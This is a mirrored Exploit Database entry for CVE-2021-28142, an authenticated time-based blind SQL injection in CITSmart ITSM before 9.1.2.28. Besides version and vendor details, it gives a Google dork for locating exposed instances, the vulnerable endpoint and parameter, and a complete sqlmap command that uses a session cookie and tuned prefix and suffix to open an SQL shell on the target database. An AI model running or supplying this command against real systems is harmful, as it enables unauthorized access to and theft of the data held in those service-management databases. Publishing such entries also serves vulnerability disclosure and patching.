CITSmart ITSM 9.1.2.27 – ‘query’ Time-based Blind SQL Injection (Authenticated)

• Exploit Database
• 130 阅读

• 作者： skysbsb
  日期： 2021-04-14
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/49763/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  # Exploit Title: CITSmart ITSM 9.1.2.27 - &apos;query&apos; Time-based Blind SQL Injection (Authenticated) # Google Dork: "citsmart.local" # Date: 11/03/2021 # Exploit Author: skysbsb # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html # Version: < 9.1.2.28 # CVE : CVE-2021-28142   To exploit this flaw it is necessary to be authenticated.   URL vulnerable: https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale Param vulnerable: query   Sqlmap usage:sqlmap -u " https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie &apos;JSESSIONID=xxx&apos; --time-sec 1 --prefix "&apos;)" --suffix "AND (&apos;abc%&apos;=&apos;abc" --sql-shell   Affected versions: < 9.1.2.28 Fixed versions: >= 9.1.2.28   Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)